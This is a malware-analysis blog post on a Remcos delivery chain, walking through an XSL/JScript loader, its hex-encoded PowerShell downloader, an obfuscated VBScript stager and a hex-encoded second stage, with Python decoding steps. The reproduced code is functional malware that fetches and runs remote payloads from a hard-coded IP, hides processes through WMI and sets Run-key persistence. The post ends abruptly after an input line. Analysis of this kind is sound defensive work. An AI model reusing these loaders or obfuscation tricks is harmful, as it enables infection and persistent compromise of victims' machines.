Skip to main content

IQ-FA007:Remcos R0lls R0yce Sighting

Posted on 2020-07-12 by Pedram Amini

Remcos: R0lls R0yce Sighting



Low Detection as of 7-9-2020

Fig 2. Low Detection



Pulls a next-stage payload via external reference to: hxxps://r0lls-r0yce.com/eft/remit[.]dotm

Fig 3. remit.dotm

<xsl:stylesheet version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="http://mycompany.com/mynamespace">

 <msxsl:script language="JScript" implements-prefix="user">
    <![CDATA[

var r = new ActiveXObject("WScript.Shell").Run("Powershell.exe  $asciiChars='24%43%6F%6D%70%75%74%65%72%20%3D%20%27%2E%27%3B%24%63%20%3D%20%5B%57%4D%49%43%4C%41%53%53%5D%22%5C%5C%24%63%6F%6D%70%75%74%65%72%5C%72%6F%6F%74%5C%63%69%6D%76%32%3A%57%49%6E%33%32%5F%50%72%6F%63%65%73%73%22%3B%24%66%20%3D%5B%57%4D%49%43%4C%41%53%53%5D%22%5C%5C%24%63%6F%6D%70%75%74%65%72%5C%72%6F%6F%74%5C%63%69%6D%76%32%3A%57%69%6E%33%32%5F%50%72%6F%63%65%73%73%53%74%61%72%74%75%70%22%3B%24%74%79%20%3D%24%66%2E%43%72%65%61%74%65%49%6E%73%74%61%6E%63%65%28%29%3B%24%74%79%2E%53%68%6F%77%57%69%6E%64%6F%77%20%3D%20%30%3B%24%70%72%6F%63%20%3D%20%24%63%2E%43%72%65%61%74%65%28%22%50%6F%77%65%72%73%68%65%6C%6C%20%27%28%26%27%2B%27%28%47%27%2B%27%43%27%2B%27%25%25%25%27%2E%72%65%70%6C%61%63%65%28%27%25%25%25%27%2C%27%4D%27%29%2B%27%20%2A%57%2D%27%2B%27%4F%2A%29%27%2B%20%27%4E%65%27%2B%27%74%2E%27%2B%27%57%27%2B%27%65%62%27%2B%27%43%27%2B%27%6C%69%27%2B%27%65%6E%74%29%27%2B%27%2E%44%27%2B%27%6F%77%27%2B%27%6E%6C%27%2B%27%6F%61%27%2B%27%64%27%2B%27%46%27%2B%27%69%6C%27%2B%27%65%28%27%27%68%74%74%70%3A%2F%2F%31%38%35%2E%31%37%32%2E%31%31%30%2E%32%31%37%2F%72%6F%62%78%2F%72%65%6D%69%74%2E%76%62%73%27%27%2C%27%27%24%65%6E%76%3A%41%50%50%44%41%54%41%27%27%2B%27%27%5C%65%78%70%6C%6F%72%65%72%2E%76%62%73%27%27%29%27%7C%49%45%58%3B%73%74%61%72%74%2D%70%72%6F%63%65%73%73%28%27%24%65%6E%76%3A%41%50%50%44%41%54%41%27%20%2B%20%27%5C%65%78%70%6C%6F%72%65%72%2E%76%62%73%27%29%22%2C%24%6E%75%6C%6C%2C%24%74%79%29';$jm=$asciiChars.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X",0);


]]> </msxsl:script>
</xsl:stylesheet>



We can use Python to decode the text above:

In [49]: data = """24%43%6F%6D%70%75%74%65%72%20%3D%20%27%2E%27%3B%24%63%20%3D%20%5B%57%4D%49%43%4C%41%53%53%5D%22%5C%5C%24%63%6F%6D%70%75%74%65%72%5C%72%6F%6F%74%5C%63%69%6D%76%32%3A%57%49%6E%33%
    ...: 32%5F%50%72%6F%63%65%73%73%22%3B%24%66%20%3D%5B%57%4D%49%43%4C%41%53%53%5D%22%5C%5C%24%63%6F%6D%70%75%74%65%72%5C%72%6F%6F%74%5C%63%69%6D%76%32%3A%57%69%6E%33%32%5F%50%72%6F%63%65%73%73%5
    ...: 3%74%61%72%74%75%70%22%3B%24%74%79%20%3D%24%66%2E%43%72%65%61%74%65%49%6E%73%74%61%6E%63%65%28%29%3B%24%74%79%2E%53%68%6F%77%57%69%6E%64%6F%77%20%3D%20%30%3B%24%70%72%6F%63%20%3D%20%24%63
    ...: %2E%43%72%65%61%74%65%28%22%50%6F%77%65%72%73%68%65%6C%6C%20%27%28%26%27%2B%27%28%47%27%2B%27%43%27%2B%27%25%25%25%27%2E%72%65%70%6C%61%63%65%28%27%25%25%25%27%2C%27%4D%27%29%2B%27%20%2A%
    ...: 57%2D%27%2B%27%4F%2A%29%27%2B%20%27%4E%65%27%2B%27%74%2E%27%2B%27%57%27%2B%27%65%62%27%2B%27%43%27%2B%27%6C%69%27%2B%27%65%6E%74%29%27%2B%27%2E%44%27%2B%27%6F%77%27%2B%27%6E%6C%27%2B%27%6
    ...: F%61%27%2B%27%64%27%2B%27%46%27%2B%27%69%6C%27%2B%27%65%28%27%27%68%74%74%70%3A%2F%2F%31%38%35%2E%31%37%32%2E%31%31%30%2E%32%31%37%2F%72%6F%62%78%2F%72%65%6D%69%74%2E%76%62%73%27%27%2C%27
    ...: %27%24%65%6E%76%3A%41%50%50%44%41%54%41%27%27%2B%27%27%5C%65%78%70%6C%6F%72%65%72%2E%76%62%73%27%27%29%27%7C%49%45%58%3B%73%74%61%72%74%2D%70%72%6F%63%65%73%73%28%27%24%65%6E%76%3A%41%50%
    ...: 50%44%41%54%41%27%20%2B%20%27%5C%65%78%70%6C%6F%72%65%72%2E%76%62%73%27%29%22%2C%24%6E%75%6C%6C%2C%24%74%79%29"""

In [50]: bytes.fromhex(data.replace("%",""))
Out[50]: b'$Computer = \'.\';$c = [WMICLASS]"\\\\$computer\\root\\cimv2:WIn32_Process";$f =[WMICLASS]"\\\\$computer\\root\\cimv2:Win32_ProcessStartup";$ty =$f.CreateInstance();$ty.ShowWindow = 0;$proc = $c.Create("Powershell \'(&\'+\'(G\'+\'C\'+\'%%%\'.replace(\'%%%\',\'M\')+\' *W-\'+\'O*)\'+ \'Ne\'+\'t.\'+\'W\'+\'eb\'+\'C\'+\'li\'+\'ent)\'+\'.D\'+\'ow\'+\'nl\'+\'oa\'+\'d\'+\'F\'+\'il\'+\'e(\'\'http://185.172.110.217/robx/remit.vbs\'\',\'\'$env:APPDATA\'\'+\'\'\\explorer.vbs\'\')\'|IEX;start-process(\'$env:APPDATA\' + \'\\explorer.vbs\')",$null,$ty)'



After pulling down the remit.vbs file hosted on the same server:

Execute("Set qSzmw = CreateObject(A55)")

IGoeL = Eval("qSzmw.ExpandEnvironmentStrings(A56)")

hNhjmvplOwAaOLCbN=Eval(kbv())

wqXOqcJkdJdgq()

GKXhaqRsIFR =Eval(iup())

Execute("VknCZrPvjTTE=IGoeL+xz1()")

Knmrerl(kol+" $g='"+VknCZrPvjTTE+hNhjmvplOwAaOLCbN+"';"+tpGBvbixtMMs())

if GKXhaqRsIFR = VknCZrPvjTTE Then

Execute(sjsjppvzjz())
else

KrnPmbtxiQ()
End if

sub KrnPmbtxiQ()

 Execute("QlRoGAMMkeBzwmFaq = GKXhaqRsIFR+hNhjmvplOwAaOLCbN")

HGMPy = wvsHEBaBTvc() & QlRoGAMMkeBzwmFaq & """ """ & VknCZrPvjTTE & """ /Y"

Knmrerl(HGMPy)

End sub

Function Knmrerl(ttt)

    ExecuteGlobal _ 
    i1 & _
    RUeS & _
    mmuwy & _
    JxnMQl & _
    ZmqC & _
    RZYfXQq & _
    LMyE & _
    xkuQUtSi & _
    obQGcDe


 End Function

Private Function eartmAh(sData) 
If Len(sData) = 0 Or Len(sData) Mod 2 <> 0 Then Exit Function

QOdP = Len(sData)

For WnQQdcztzxmT = 1 To QOdP
  If WnQQdcztzxmT Mod 2 <> 0 Then  
    YGcJgtkjCCz = YGcJgtkjCCz & Chr(Eval("&H" & Mid(sData, WnQQdcztzxmT, 2)))
    eartmAh = YGcJgtkjCCz
  End If
Next
End Function

Function sXHTcJPBlK(fg55)
    Dim p
  For p = Len(fg55) To 1 Step -1
      rer7e0v = rer7e0v & Mid(fg55, p, 1)
  Next

  sXHTcJPBlK=rer7e0v
End Function

Function ZeROwYri(OcmCBZ)
Dim l , strRet 

    For l = LBound(OcmCBZ) To UBound(OcmCBZ)
        strRet = strRet & Hex(OcmCBZ(l)) & ""
    Next 

  ZeROwYri =strRet
End Function

Function wqXOqcJkdJdgq()
AiIi="X`E`I|''#(:nioj-#(:mj$;}))61,_$(61tniot::]trevnoc[(]rahc[{#(:hcaErof#(:|#(:)'#(:'(tilpS.BOAfwsPxNuRGDZdNsktH$=mj$;'D4#(:C7#(:72#(:72#(:02#(:E6#(:96#(:F6#(:A6#(:D2#(:02#(:37#(:27#(:16#(:86#(:34#(:96#(:96#(:36#(:37#(:16#(:42#(:02#(:D3#(:76#(:E6#(:96#(:27#(:47#(:35#(:96#(:96#(:36#(:37#(:16#(:42#(:B3#(:D7#(:22#(:F5#(:42#(:87#(:03#(:22#(:D5#(:56#(:47#(:97#(:26#(:B5#(:D5#(:27#(:16#(:86#(:36#(:B5#(:B7#(:02#(:47#(:36#(:56#(:A6#(:26#(:F4#(:D2#(:86#(:36#(:16#(:54#(:27#(:F6#(:64#(:C7#(:02#(:72#(:D2#(:72#(:02#(:47#(:96#(:C6#(:07#(:37#(:D2#(:02#(:67#(:D6#(:42#(:02#(:D3#(:37#(:27#(:16#(:86#(:34#(:96#(:96#(:36#(:37#(:16#(:42#(:B3#(:85#(:06#(:54#(:06#(:94#(:C7#(:72#(:92#(:72#(:72#(:76#(:07#(:A6#(:E2#(:B6#(:36#(:16#(:47#(:47#(:14#(:F2#(:87#(:26#(:F6#(:27#(:F2#(:73#(:13#(:23#(:E2#(:03#(:13#(:13#(:E2#(:23#(:73#(:13#(:E2#(:53#(:83#(:13#(:F2#(:F2#(:A3#(:07#(:47#(:47#(:86#(:72#(:72#(:82#(:76#(:E6#(:96#(:72#(:B2#(:72#(:27#(:47#(:72#(:B2#(:72#(:35#(:72#(:B2#(:72#(:46#(:72#(:B2#(:72#(:16#(:F6#(:72#(:B2#(:72#(:C6#(:E6#(:72#(:B2#(:72#(:77#(:F6#(:72#(:B2#(:72#(:44#(:E2#(:72#(:B2#(:72#(:92#(:47#(:E6#(:56#(:72#(:B2#(:72#(:96#(:C6#(:72#(:B2#(:72#(:34#(:72#(:B2#(:72#(:26#(:56#(:72#(:B2#(:72#(:75#(:72#(:B2#(:72#(:E2#(:47#(:72#(:B2#(:72#(:56#(:E4#(:72#(:02#(:B2#(:72#(:02#(:47#(:72#(:B2#(:72#(:36#(:72#(:B2#(:72#(:56#(:A6#(:72#(:B2#(:72#(:26#(:72#(:B2#(:72#(:F4#(:D2#(:72#(:B2#(:72#(:77#(:5"
AiIi=AiIi+"6#(:72#(:B2#(:72#(:E4#(:82#(:72#(:D3#(:67#(:D6#(:42#(:B3#(:23#(:23#(:07#(:42#(:02#(:D3#(:02#(:C6#(:F6#(:36#(:F6#(:47#(:F6#(:27#(:05#(:97#(:47#(:96#(:27#(:57#(:36#(:56#(:35#(:A3#(:A3#(:D5#(:27#(:56#(:76#(:16#(:E6#(:16#(:D4#(:47#(:E6#(:96#(:F6#(:05#(:56#(:36#(:96#(:67#(:27#(:56#(:35#(:E2#(:47#(:56#(:E4#(:E2#(:D6#(:56#(:47#(:37#(:97#(:35#(:B5#(:B3#(:92#(:23#(:73#(:03#(:33#(:02#(:C2#(:D5#(:56#(:07#(:97#(:45#(:C6#(:F6#(:36#(:F6#(:47#(:F6#(:27#(:05#(:97#(:47#(:96#(:27#(:57#(:36#(:56#(:35#(:E2#(:47#(:56#(:E4#(:E2#(:D6#(:56#(:47#(:37#(:97#(:35#(:B5#(:82#(:47#(:36#(:56#(:A6#(:26#(:F4#(:F6#(:45#(:A3#(:A3#(:D5#(:D6#(:57#(:E6#(:54#(:B5#(:02#(:D3#(:02#(:23#(:23#(:07#(:42#(:B3#(:92#(:76#(:E6#(:96#(:07#(:42#(:82#(:02#(:C6#(:96#(:47#(:E6#(:57#(:02#(:D7#(:47#(:56#(:96#(:57#(:15#(:D2#(:02#(:13#(:02#(:47#(:E6#(:57#(:F6#(:36#(:D2#(:02#(:D6#(:F6#(:36#(:E2#(:56#(:C6#(:76#(:F6#(:F6#(:76#(:02#(:07#(:D6#(:F6#(:36#(:D2#(:02#(:E6#(:F6#(:96#(:47#(:36#(:56#(:E6#(:E6#(:F6#(:36#(:D2#(:47#(:37#(:56#(:47#(:02#(:D3#(:02#(:76#(:E6#(:96#(:07#(:42#(:B7#(:02#(:F6#(:46#(:B3#(:56#(:E6#(:F6#(:26#(:45#(:42#(:02#(:D4#(:02#(:C6#(:16#(:37#(:B3#(:92#(:72#(:94#(:72#(:C2#(:72#(:A2#(:72#(:82#(:56#(:36#(:16#(:C6#(:07#(:56#(:27#(:E2#(:72#(:85#(:54#(:A2#(:72#(:D3#(:56#(:E6#(:F6#(:26#(:45#(:42'=BOAfwsPxNuRGDZdNsktH$#(:ssapyB#(:yciloPnoitucexE"
Execute("AiIi=replace(AiIi,""#(:"","" "")")
Execute(QbDLgs("K n m r e r l(kol+s p a c e(1)+""-""+sXHTcJPBlK(AiIi))"))
Execute(QbDLgs("K n m r e r l(kol+s p a c e(1)+""-""+sXHTcJPBlK(AiIi))"))
End function


Function i1()
Z1="83&+:117&+:98&+:32&+:75&+:110&+:109&+:114&+:101&+:114&+:108&+:40&+:116&+:116&+:116&+:41&+:58&+:32"
Z12=PDSfB(Z1)
i1=eartmAh(ZeROwYri(Z12))
End Function 

Function RUeS()
Z2="68&+:105&+:109&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:44&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:44&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:44&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:44&+:105&+:110&+:116&+:82&+:101&+:116&+:117&+:114&+:110&+:44&+:105&+:110&+:116&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:73&+:68&+:58&+:32"
Z22=PDSfB(Z2)
RUeS=eartmAh(ZeROwYri(Z22))
End Function

Function mmuwy()
Z4="83&+:101&+:116&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:32&+:61&+:32&+:71&+:101&+:116&+:79&+:98&+:106&+:101&+:99&+:116&+:40&+:34&+:119&+:105&+:110&+:109&+:103&+:109&+:116&+:115&+:58&+:123&+:105&+:109&+:112&+:101&+:114&+:115&+:111&+:110&+:97&+:116&+:105&+:111&+:110&+:76&+:101&+:118&+:101&+:108&+:61&+:105&+:109&+:112&+:101&+:114&+:115&+:111&+:110&+:97&+:116&+:101&+:125&+:33&+:92&+:92&+:46&+:92&+:114&+:111&+:111&+:116&+:92&+:99&+:105&+:109&+:118&+:50&+:34&+:41&+:58&+:32"
Z42=PDSfB(Z4)
mmuwy=eartmAh(ZeROwYri(Z42))
End Function

Function JxnMQl()
Z5="83&+:101&+:116&+:32&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:32&+:61&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:46&+:71&+:101&+:116&+:40&+:34&+:87&+:105&+:110&+:51&+:50&+:95&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:34&+:41&+:58&+:32"
Z52=PDSfB(Z5)
JxnMQl=eartmAh(ZeROwYri(Z52))
End Function

Function ZmqC()
Z6="83&+:101&+:116&+:32&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:32&+:61&+:32&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:46&+:83&+:112&+:97&+:119&+:110&+:73&+:110&+:115&+:116&+:97&+:110&+:99&+:101&+:95&+:58&+:32"
Z62=PDSfB(Z6)
ZmqC=eartmAh(ZeROwYri(Z62))
End Function

Function RZYfXQq()
Z7="111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:46&+:83&+:104&+:111&+:119&+:87&+:105&+:110&+:100&+:111&+:119&+:32&+:61&+:32&+:48&+:58&+:32"
Z72=PDSfB(Z7)
RZYfXQq=eartmAh(ZeROwYri(Z72))
End Function


Function LMyE()
Z8="83&+:101&+:116&+:32&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:32&+:61&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:46&+:71&+:101&+:116&+:40&+:34&+:87&+:105&+:110&+:51&+:50&+:95&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:34&+:41&+:58&+:32"
Z82=PDSfB(Z8)
LMyE=eartmAh(ZeROwYri(Z82))
End Function

Function xkuQUtSi()
Z9="105&+:110&+:116&+:82&+:101&+:116&+:117&+:114&+:110&+:32&+:61&+:32&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:46&+:67&+:114&+:101&+:97&+:116&+:101&+:40&+:116&+:116&+:116&+:44&+:32&+:78&+:117&+:108&+:108&+:44&+:32&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:44&+:32&+:105&+:110&+:116&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:73&+:68&+:41&+:58&+:32"
Z92=PDSfB(Z9)
xkuQUtSi=eartmAh(ZeROwYri(Z92))
End Function

Function obQGcDe()
Z10="69&+:110&+:100&+:32&+:83&+:117&+:98"
Z102=PDSfB(Z10)
obQGcDe=eartmAh(ZeROwYri(Z102))
End Function

Function sjsjppvzjz()
Z11="87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:81&+:117&+:105&+:116&+:40&+:41"
Z112=PDSfB(Z11)
sjsjppvzjz=eartmAh(ZeROwYri(Z112))
End Function

Function tpGBvbixtMMs()
Z12="39&+:83&+:101&+:116&+:45&+:73&+:116&+:101&+:109&+:32&+:45&+:80&+:97&+:116&+:104&+:32&+:72&+:75&+:67&+:85&+:58&+:92&+:83&+:111&+:102&+:116&+:119&+:97&+:114&+:101&+:92&+:77&+:105&+:99&+:114&+:111&+:64&+:64&+:111&+:102&+:116&+:92&+:87&+:105&+:110&+:100&+:111&+:119&+:64&+:64&+:92&+:67&+:117&+:114&+:114&+:101&+:110&+:116&+:86&+:101&+:114&+:64&+:64&+:105&+:111&+:110&+:92&+:82&+:117&+:110&+:32&+:45&+:86&+:97&+:108&+:117&+:101&+:32&+:36&+:103&+:39&+:46&+:114&+:101&+:112&+:108&+:97&+:99&+:101&+:40&+:39&+:64&+:64&+:39&+:44&+:39&+:115&+:39&+:41&+:32&+:124&+:73&+:96&+:69&+:96&+:88"
Z122=PDSfB(Z12)
tpGBvbixtMMs=eartmAh(ZeROwYri(Z122))
End Function

Function wvsHEBaBTvc()
Z13="99&+:109&+:100&+:32&+:47&+:99&+:32&+:99&+:111&+:112&+:121&+:32&+:34"
Z132=PDSfB(Z13)
wvsHEBaBTvc=eartmAh(ZeROwYri(Z132))
End Function 

Function iup()
vlf="76&+:101&+:102&+:116&+:40&+:87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:70&+:117&+:108&+:108&+:78&+:97&+:109&+:101&+:44&+:73&+:110&+:83&+:116&+:114&+:82&+:101&+:118&+:40&+:87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:70&+:117&+:108&+:108&+:78&+:97&+:109&+:101&+:44&+:34&+:92&+:34&+:41&+:41"
vbn=PDSfB(vlf)
iup=eartmAh(ZeROwYri(vbn))
End Function

Function kol()
jsd="80&+:111&+:119&+:101&+:114&+:115&+:104&+:101&+:108&+:108"
jsd2=PDSfB(jsd)
kol=eartmAh(ZeROwYri(jsd2))

End Function 

Function A55()
A551="87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:104&+:101&+:108&+:108"
A552=PDSfB(A551)
A55=eartmAh(ZeROwYri(A552))
End Function 

Function A56()
A561="37&+:85&+:83&+:69&+:82&+:80&+:82&+:79&+:70&+:73&+:76&+:69&+:37"
A562=PDSfB(A561)
A56=eartmAh(ZeROwYri(A562))
End Function

Function xz1()
wf1="92&+:65&+:112&+:112&+:68&+:97&+:116&+:97&+:92&+:76&+:111&+:99&+:97&+:108&+:92&+:77&+:105&+:99&+:114&+:111&+:115&+:111&+:102&+:116&+:92"
wf2=PDSfB(wf1)
xz1=eartmAh(ZeROwYri(wf2))
End Function

Function  kbv()
 kbv1="87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:78&+:97&+:109&+:101"
 kbv2=PDSfB(kbv1)
 kbv=eartmAh(ZeROwYri(kbv2))
End Function 

Function PDSfB(Str)
PDSfB=Eval(QbDLgs("S p l i t(S t r,""&+:"")"))
End Function

Function QbDLgs(rhltZ)
igxMOdo = ""
For i=1 to len(rhltZ)
    char = Mid(rhltZ,i,1)
    if(char<>" ") then
    igxMOdo = igxMOdo+Mid(rhltZ,i,1)
    End if
Next
QbDLgs=igxMOdo
End Function





Looks like a bunch of encoded strings...lets grep them out and decode them for a quick and dirty peak behind the encoding.

❯ grep "+:" remit.vbs | cut -d'"' -f2
83&+:117&+:98&+:32&+:75&+:110&+:109&+:114&+:101&+:114&+:108&+:40&+:116&+:116&+:116&+:41&+:58&+:32
68&+:105&+:109&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:44&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:44&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:44&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:44&+:105&+:110&+:116&+:82&+:101&+:116&+:117&+:114&+:110&+:44&+:105&+:110&+:116&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:73&+:68&+:58&+:32
83&+:101&+:116&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:32&+:61&+:32&+:71&+:101&+:116&+:79&+:98&+:106&+:101&+:99&+:116&+:40&+:34&+:119&+:105&+:110&+:109&+:103&+:109&+:116&+:115&+:58&+:123&+:105&+:109&+:112&+:101&+:114&+:115&+:111&+:110&+:97&+:116&+:105&+:111&+:110&+:76&+:101&+:118&+:101&+:108&+:61&+:105&+:109&+:112&+:101&+:114&+:115&+:111&+:110&+:97&+:116&+:101&+:125&+:33&+:92&+:92&+:46&+:92&+:114&+:111&+:111&+:116&+:92&+:99&+:105&+:109&+:118&+:50&+:34&+:41&+:58&+:32
83&+:101&+:116&+:32&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:32&+:61&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:46&+:71&+:101&+:116&+:40&+:34&+:87&+:105&+:110&+:51&+:50&+:95&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:34&+:41&+:58&+:32
83&+:101&+:116&+:32&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:32&+:61&+:32&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:46&+:83&+:112&+:97&+:119&+:110&+:73&+:110&+:115&+:116&+:97&+:110&+:99&+:101&+:95&+:58&+:32
111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:46&+:83&+:104&+:111&+:119&+:87&+:105&+:110&+:100&+:111&+:119&+:32&+:61&+:32&+:48&+:58&+:32
83&+:101&+:116&+:32&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:32&+:61&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:46&+:71&+:101&+:116&+:40&+:34&+:87&+:105&+:110&+:51&+:50&+:95&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:34&+:41&+:58&+:32
105&+:110&+:116&+:82&+:101&+:116&+:117&+:114&+:110&+:32&+:61&+:32&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:46&+:67&+:114&+:101&+:97&+:116&+:101&+:40&+:116&+:116&+:116&+:44&+:32&+:78&+:117&+:108&+:108&+:44&+:32&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:44&+:32&+:105&+:110&+:116&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:73&+:68&+:41&+:58&+:32
69&+:110&+:100&+:32&+:83&+:117&+:98
87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:81&+:117&+:105&+:116&+:40&+:41
39&+:83&+:101&+:116&+:45&+:73&+:116&+:101&+:109&+:32&+:45&+:80&+:97&+:116&+:104&+:32&+:72&+:75&+:67&+:85&+:58&+:92&+:83&+:111&+:102&+:116&+:119&+:97&+:114&+:101&+:92&+:77&+:105&+:99&+:114&+:111&+:64&+:64&+:111&+:102&+:116&+:92&+:87&+:105&+:110&+:100&+:111&+:119&+:64&+:64&+:92&+:67&+:117&+:114&+:114&+:101&+:110&+:116&+:86&+:101&+:114&+:64&+:64&+:105&+:111&+:110&+:92&+:82&+:117&+:110&+:32&+:45&+:86&+:97&+:108&+:117&+:101&+:32&+:36&+:103&+:39&+:46&+:114&+:101&+:112&+:108&+:97&+:99&+:101&+:40&+:39&+:64&+:64&+:39&+:44&+:39&+:115&+:39&+:41&+:32&+:124&+:73&+:96&+:69&+:96&+:88
99&+:109&+:100&+:32&+:47&+:99&+:32&+:99&+:111&+:112&+:121&+:32&+:34
76&+:101&+:102&+:116&+:40&+:87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:70&+:117&+:108&+:108&+:78&+:97&+:109&+:101&+:44&+:73&+:110&+:83&+:116&+:114&+:82&+:101&+:118&+:40&+:87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:70&+:117&+:108&+:108&+:78&+:97&+:109&+:101&+:44&+:34&+:92&+:34&+:41&+:41
80&+:111&+:119&+:101&+:114&+:115&+:104&+:101&+:108&+:108
87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:104&+:101&+:108&+:108
37&+:85&+:83&+:69&+:82&+:80&+:82&+:79&+:70&+:73&+:76&+:69&+:37
92&+:65&+:112&+:112&+:68&+:97&+:116&+:97&+:92&+:76&+:111&+:99&+:97&+:108&+:92&+:77&+:105&+:99&+:114&+:111&+:115&+:111&+:102&+:116&+:92
87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:78&+:97&+:109&+:101



Slap it into Python and decode, while this wont be in order, it will give us the jist of the situation:

In [48]: "".join(map(chr, (map(int, data.replace("\n", "").split("&+:")))))
Out[48]: 'Sub Knmrerl(ttt):ೄim objWMIService,objStartup,objConfig,objProcess,intReturn,intProcessID:\u0cd3et objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"):\u0cd3et objStartup = objWMIService.Get("Win32_ProcessStartup"):\u0cd3et objConfig = objStartup.SpawnInstance_:絯bjConfig.ShowWindow = 0:\u0cd3et objProcess = objWMIService.Get("Win32_Process"):絩ntReturn = objProcess.Create(ttt, Null, objConfig, intProcessID):\u0cc5nd Su⚟Script.Quit(ါSet-Item -Path HKCU:\\Software\\Micro@@oft\\Window@@\\CurrentVer@@ion\\Run -Value $g\'.replace(\'@@\',\'s\') |I`E`⋃md /c copy ඔeft(WScript.ScriptFullName,InStrRev(WScript.ScriptFullName,"\\")ၔowershel⪇Script.Shel⩕USERPROFILE໐AppData\\Local\\Microsoft⑇Script.ScriptName'



The VBS script will then download: hxxp://185.172.110[.]217/robx/Attack.jpg

This file appears to containt a sequence of decimal encoded bytes. Let's convert, again with Python, and examine the head and tail:

In [67]: open("Attack.jpg").read()[:1024]
Out[67]: '66-75-6E-63-74-69-6F-6E-20-75-4F-58-43-64-6C-42-4B-20-7B-0D-0A-0D-0A-09-5B-43-6D-64-6C-65-74-42-69-6E-64-69-6E-67-28-29-5D-0D-0A-20-20-20-20-50-61-72-61-6D-20-28-5B-62-79-74-65-5B-5D-5D-20-24-4A-72-5A-4E-57-29-0D-0A-20-0D-0A-09-50-72-6F-63-65-73-73-20-7B-0D-0A-09-20-20-20-20-0D-0A-20-20-20-20-20-20-20-20-24-59-59-6B-47-20-3D-20-4E-65-77-2D-4F-62-6A-65-63-74-20-27-53-79-73-74-65-21-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-6D-6F-72-79-53-74-72-65-61-6D-27-2E-52-65-70-6C-61-63-65-28-27-21-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-27-2C-27-6D-2E-49-4F-2E-4D-65-27-29-20-28-20-2C-20-24-4A-72-5A-4E-57-20-29-0D-0A-09-20-20-20-20-24-6B-48-54-49-6C-44-52-63-20-3D-20-4E-65-77-2D-4F-62-6A-65-63-74-20-27-53-79-73-74-65-21-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-6D-6F-72-79-53-74-72-65-61-6D-27-2E-52-65-70-6C-61-63-65-28-27-21-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-27-2C-27-6D-2E-49-4F-2E-4D-65-27-29-0D-0A-20-20-20-20-20-20-20-20-20-20-20-20-24-62-59-55-4E-5'

In [67]: data = bytes.fromhex(open("Attack.jpg").read().replace("-", ""))

In [69]: data[:1024]
